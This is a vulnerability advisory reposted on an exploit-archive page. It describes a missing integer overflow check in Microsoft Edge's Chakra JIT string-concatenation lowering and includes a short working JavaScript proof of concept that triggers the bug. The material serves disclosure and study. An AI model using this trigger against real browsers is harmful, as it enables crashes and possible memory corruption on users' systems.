Lucene search

K
zdtGoogle Security Research1337DAY-ID-29427
HistoryJan 10, 2018 - 12:00 a.m.

Microsoft Edge Chakra JIT - Lowerer::LowerSetConcatStrMultiItem Missing Integer Overflow Check

2018-01-1000:00:00
Google Security Research
0day.today
14

0.856 High

EPSS

Percentile

98.6%

Exploit for windows platform in category dos / poc

/*
The method "Lowerer::LowerSetConcatStrMultiItem" is used to generate machine code to concatenate strings.
Here's a snippet of the method.
void Lowerer::LowerSetConcatStrMultiItem(IR::Instr * instr)
{
    ...
    IR::IndirOpnd * dstLength = IR::IndirOpnd::New(concatStrOpnd, Js::ConcatStringMulti::GetOffsetOfcharLength(), TyUint32, func);
    ...
    InsertAdd(false, dstLength, dstLength, srcLength, instr); <<------ (a)
    ...
}
 
At (a), there's no check for integer overflow.
 
Note: Chakra uses string chains to handle concatenated strings(the ConcatString class). So it doesn't require much memory to trigger the bug.
 
PoC:
*/
 
let a = '';
let b = 'A'.repeat(0x10000);
for (let i = 0; i < 0x10000; i++) {
    a = 'BBBBBBBBB' + a + b;
}
 
print(a.length);
print(b.length);
print(a[0]);

#  0day.today [2018-03-05]  #